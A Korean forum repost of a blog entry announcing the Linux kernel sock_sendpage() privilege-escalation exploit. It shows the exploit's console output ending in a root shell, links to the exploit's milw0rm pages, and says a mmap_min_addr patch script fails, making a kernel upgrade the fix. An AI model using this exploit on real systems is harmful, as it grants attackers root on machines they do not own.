linux kernel sock_sendpage() exploit
linux kernel sock_sendpage() exploit 을 보고 올립니다-.-;;
이하 원문글은 박찬암님 블로그에서 발췌하였습니다..
출처 : http://hkpco.egloos.com
약 10시간 전 쯤에 milw0rm을 보다가 새로운 익스플로잇이 나온걸 확인했습니다.
요즘 ISEC 때문에 정신없어서 좀 늦게 확인했는데, 어쨋든 신선한 소식입니다!,
sock_sendpage() 내부의 취약성을 이용한것 같은데, 오우.. 멋지네요. ㅎㅎ
아래는 공격코드 실행 결과입니다.
[hkpco@servera122 wunderbar_emporium]$ ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc0801494
[+] Resolved selinux_enabled to 0xc06e5e20
[+] Resolved security_ops to 0xc07ff9c0
[+] Resolved sel_read_enforce to 0xc04c43b0
[+] Resolved audit_enabled to 0xc07f31a0
[+] got ring0!
[+] detected 2.6 style 4k stacks
sh: mplayer: command not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
sh-3.2# id
uid=0(root) gid=0(root) groups=518(hkpco)
관련 익스플로잇은 다음 링크에서 확인하실 수 있습니다.
http://milw0rm.com/exploits/9435
http://milw0rm.com/exploits/9436
그리고!, 임시 패치는 아래 링크의 스크립트를 실행시키면 된다고 합니다.
http://rfxn.com/downloads/set_mmap_minaddr
-------------------------------------------------------- 박찬암님의 글원문입니다..
실제 임시패치 스크립트로 커널 파라미터 값을 조정하여도 임시방편은 되지않습니다.
커널을 업그레이드하는 방법뿐이 답이 될듯합니다.^^:
추가로 http://nchovy.kr/forum/2/article/480 이부분도 참고하시기 바랍니다..
아
너무 성급하게 올린 나머지 잘못 쓴 내용이 있는데,
익스플로잇 코드 내에 mmap_min_addr을 우회하는 테크닉이 들어가 있기 때문에 위에서 말한 임시 패치로는 방어가 되지 않습니다.
말씀하신 대로 커널 업그레이드가 가장 좋은 방법인 것 같구요.
그럼!, :-)
=============
박찬암 (hkpco)
http://hkpco.kr/
=============
박찬암 (hkpco)
http://hkpco.kr/